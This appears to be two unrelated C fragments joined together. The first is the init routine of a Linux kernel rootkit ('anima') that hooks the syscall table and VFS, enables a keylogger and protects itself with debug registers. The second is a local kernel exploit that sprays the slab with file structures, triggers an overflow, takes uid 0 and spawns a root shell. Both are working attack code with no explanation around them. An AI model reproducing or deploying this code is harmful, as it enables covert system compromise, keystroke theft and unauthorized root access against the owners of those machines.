static int __init anima_init(void)
{
int ret;
pr_debug("%s: init\n", __func__);
/* MUST be called first */
ret = get_kernel_syms();
if (ret)
return 0;
/* architecture specific */
ret = arch_hw_breakpoint_init();
if (ret)
return 0;
arch_hw_breakpoint_debug();
if (rk_cfg.hook_syscall)
hook_sys_call_table();
if (rk_cfg.hook_vfs)
vfs_hook();
if (rk_cfg.keylogger)
keylogger_init();
#if ARCH_X86
if (rk_cfg.dr_protect)
x86_hw_breakpoint_protect_enable();
#endif
rk_cfg.state = RK_ACTIVE;
return 0;
}
int main(int argc, char ** argv) {
int i, nbfiles;
int * files;
char tmpfile[100];
get_kernel_syms();
files = malloc(sizeof(int));
//check_slabs();
/* Spray slab with file structs */
for (i=0;;i++) {
sprintf(tmpfile, "/tmp/tmpfile%d", i);
files = realloc(files, (i+1)*sizeof(int));
if ((files[i] = open(tmpfile, O_RDWR|O_CREAT|O_SYNC)) < 0)
break;
}
//check_slabs();
printf("[+] Created %d files\n", nbfiles = i);
/* We cannot check slab info
* so may not be properly aligned
* (should work with argv[1] = 3)
*/
for (i=0;i< (argc > 1 ? atoi(argv[1]) : 1);i++) {
close(files[nbfiles-4-i]);
}
do_overflow();
for (i=0;i<nbfiles;i++)
write(files[i], "YOUPI", 5);
for (i=0;i<nbfiles;i++)
close(files[i]);
if (setresuid(0, 0, 0)) {
printf("[-] Exploit failed :(\n");
exit(1);
}
setresgid(0, 0, 0);
printf("[+] Launching root shell!\n");
execl("/bin/sh", "/bin/sh", NULL);
return 1;
}
